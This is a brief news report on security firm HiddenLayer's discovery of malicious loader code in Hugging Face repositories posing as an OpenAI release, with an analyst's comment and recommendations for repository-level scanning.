Malicious loader code in Hugging Face repo posed as OpenAI
Researchers found malicious loader code on Hugging Face posing as an OpenAI release; it fetched attacker-controlled code and six other repositories used nearly identical loaders.
Security firm HiddenLayer found loader code in a Hugging Face repository that impersonated an OpenAI release. The loader executed during repository setup and contacted attacker-controlled servers to retrieve additional code.
HiddenLayer identified six other Hugging Face repositories that used almost identical loader logic and connected to the same backend services. The firm reported the finding after investigating the original repository claim.
The malicious code was placed in peripheral repository files rather than inside model weights. Examples include setup scripts, notebooks, dependency files and other repository code. These files may run during setup or when developers execute notebooks or install packages, creating an entry point that checks of model weights alone would not find.
Sakshi Grover, senior research manager for cybersecurity services at IDC, warned: “Traditional software composition analysis was designed to inspect dependency manifests, libraries and container images; it is less effective at identifying malicious loader logic in AI repositories.”
HiddenLayer advised scanning repository code, dependency files and third-party install scripts in addition to checking model files and known malicious model signatures. The firm said platform operators should detect and block malicious loader patterns and restrict which repository files can run automatically.
The discovery follows other reports of poisoned AI software development kits and fake installers distributed on the same platform. An IDC FutureScape report from November 2025 recommended that by 2027, 60% of agentic AI systems should include a bill of materials to track component sources, approved versions and any executable pieces that could run during development or deployment.
Researchers highlighted that the risk comes from executable artifacts stored with models rather than from model weights themselves. They called for more rigorous repository-level scanning and stronger controls around repository files to reduce the chance that development workflows become a route into secure environments.
Content on BlockPort is provided for informational purposes only and does not constitute financial guidance.
We strive to ensure the accuracy and relevance of the information we share, but we do not guarantee that all content is complete, error-free, or up to date. BlockPort disclaims any liability for losses, mistakes, or actions taken based on the material found on this site.
Always conduct your own research before making financial decisions and consider consulting with a licensed advisor.
For further details, please review our Terms of Use, Privacy Policy, and Disclaimer.
Articles by this author
